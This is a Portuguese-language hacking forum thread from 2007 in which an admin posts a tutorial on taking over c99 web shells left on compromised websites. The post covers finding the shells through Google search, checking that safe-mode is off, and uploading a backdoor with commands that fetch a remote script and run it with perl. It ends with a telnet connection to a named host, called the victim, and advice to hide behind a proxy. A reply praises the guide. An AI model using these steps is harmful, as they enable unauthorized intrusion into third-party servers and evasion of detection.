|
 |
|
 |
|
| Autor |
Mensagem |
darklife
Admin
Registrado em: 24 Abr 2007
Mensagens: 18
|
 Colocada: Ter Abr 24, 2007 9:00 pm Assunto: PHP Injection - Ownando uma Shell |
 |
|
PHP Injection - Ownando uma Shell
Olá,
aqui mostrarei com imagens alguns macetes para se ownar uma Shell.
Eu scaniei pelo site do Google mesmo, coloquei o nome de uma CMD.
Repare aonde eu circulei, isso mostra que o site já está com o c99shell (CMD usada),
assim eu abro ela..
Já nessa segunda imagem é a CMD no site, mais este ainda não é bom para ownar,
Veja que o Safe-mode: ON (secure).
Logo não é ownavel!
Em outra busca eu acho uma em que está em Safe-mode: OFF
está é boa..
então eu abro o arquivo /tmp/ ali no ":: Go Dir ::"
Agora você vê que tem bastante arquivos na pasta, porque esta é a pasta principal da Shell,
Agora é upar a Backdoor..
só um detalhe que não apareceu para fazer a shell upar algum arquivo seu
precisa de um comando antes, aí varia de shell para shell,
vou por os mais conhecidos: wget, fench, lwp-download, get..
Não se esquecendo que alguns desses comandos precisa fazer o perl arquivo.extensão
para upar no "Enter:"
Exemplo:
fetch http://www.cebolinha.org/owned.txt
perl owned.txt
Ou ainda você pode juntar os dois em uma linha só:
fench http://www.cebolinha.org/owned.txt;perl owned.txt
Última imagem, e esta é a que vocês precisam tomar maior cuidado,
Esta shell já está rooteada, isto é: você não vai conseguir ownar,
muito menos rootear.
E você tentando fazer isso, o dono desta pode pegar seu IP e te mandar uns packets para você ficar esperto. 
Então olhe se ela já está rooteada.. e como vê isso?
Simples, quando está rooteada ela vem o nome e número igual,
neste caso veio com: 80(www).
Geralmente quando não está rooteada vem com palavras diferentes como: Apache.
Com isso também é bom ficar esperto e sempre estar em total camuflagem,
usando uma proxy ou algo do tipo!
**
Detalhe esqueci de terminar o own da shell
Depois que você fizer o up da backdoor, você vai abrir Telnet com ela,
usando o mesmo exemplo da imagem:
Execultar (botão do windows+r) telnet st116.startlogic.com 1666
No caso ali o st116.startlogic.com seria o IP da vítima!
Agora é só se divertir, ou ainda ir além e tentar rootear.
Mais isso vai de você, tem alguns tópicos bons de root aqui no fórum,
dêem uma pesquisada!
Espero ter esclarecido as dúvidas, mais se tiver alguma postem aqui!
Editado pela última vez por darklife em Dom Abr 29, 2007 2:48 am, num total de 1 vez |
|
| Voltar ao topo |
|
|
|
|
 |
|
 |
|
|
|
|
| Autor |
Mensagem |
ne0h_
User
Registrado em: 24 Abr 2007
Mensagens: 2
|
| Colocada: Qua Abr 25, 2007 10:42 pm Assunto: |
|
|
| bem resumido e pratico muito bom. |
|
| Voltar ao topo |
|
|
|
|
|
|
|
|
|
|
|
|
Neste fórum, você Não pode colocar mensagens novas
Não pode responder a mensagens
Não pode editar as suas mensagens
Não pode remover as suas mensagens
Você Não pode votar neste fórum
|
|
|
|
|
|
|
|
